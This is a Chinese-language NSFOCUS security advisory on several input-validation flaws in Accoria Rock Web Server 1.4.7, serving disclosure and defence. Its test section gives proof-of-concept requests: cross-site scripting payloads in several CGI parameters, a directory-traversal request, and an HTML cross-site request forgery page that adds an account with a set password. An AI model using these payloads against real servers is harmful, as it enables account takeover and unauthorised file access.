绿盟科技NSFOCUS安全漏洞系统

安全研究

安全漏洞

Accoria Rock Web Server多个输入验证漏洞

发布日期：2010-06-01
更新日期：2010-06-02

受影响系统：

Accoria Networks Rock Web Server 1.4.7

描述：

BUGTRAQ  ID: 40498
CVE(CAN) ID: CVE-2010-2267,CVE-2010-2268,CVE-2010-2269,CVE-2010-2270,CVE-2010-2271

Rock Web Server又被称为Accoria web server，是新一代的web服务器。

Rock Web Server的servercfg.cgi、httpcfg.cgi、loadstatic.cgi、authcfg.cgi等脚本和getenv样例代码中存在多个输入验证错误，远程攻击者可以通过提交恶意URI请求执行跨站脚本、目录遍历、跨站请求伪造等各种攻击。

<*来源：Ilja van Sprundel （ilja@suresec.org）

  链接：http://www.kb.cert.org/vuls/id/245081
        http://www.ioactive.com/pdfs/AccoriaWebServer.pdf
        http://secunia.com/advisories/39998/
*>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://192.168.0.101/cgibin/getenv?<html><title>deaap</title><body><blink>toeter</body></html>
http://192.168.0.101:9090/loadstatic.cgi?desc=<blink>TOETER&name=
http://192.168.0.101:9090/loadstatic.cgi?desc=%3Cblink%3ETOETER&name=../../README
http://192.168.0.101:9090/httpdcfg.cgi?type=4&name=<XSS>
http://192.168.0.101:9090/servercfg.cgi?dns=<XSS>&port=80&type=27&direct=1

<html><tilte>XSRF demo</title>

<body>
<a
href="http://192.168.0.101:9090/authcfg.cgi?path=%2Fexport%2Fhome
%2Filja%2FDesktop%2Fhttpd%2Fconf%2Fpassword&user=ilja&pwd1=deaap&
pwd2=deaap&type=21">click here to add account with user ilja,
pass deaap (you'll need to change the password path in the
link)</a>
</body></html>

建议：

厂商补丁：

Accoria Networks
----------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.accoria.com/cgi-bin/load?name=webserver.html&desc=Rock%20Web%20Server

浏览次数：2160
严重程度：0（网友投票）

关于我们: 公司介绍; 公司荣誉; 公司新闻

联系我们: 公司总部; 分支机构; 海外机构

快速链接: 绿盟云; 绿盟威胁情报中心NTI; 技术博客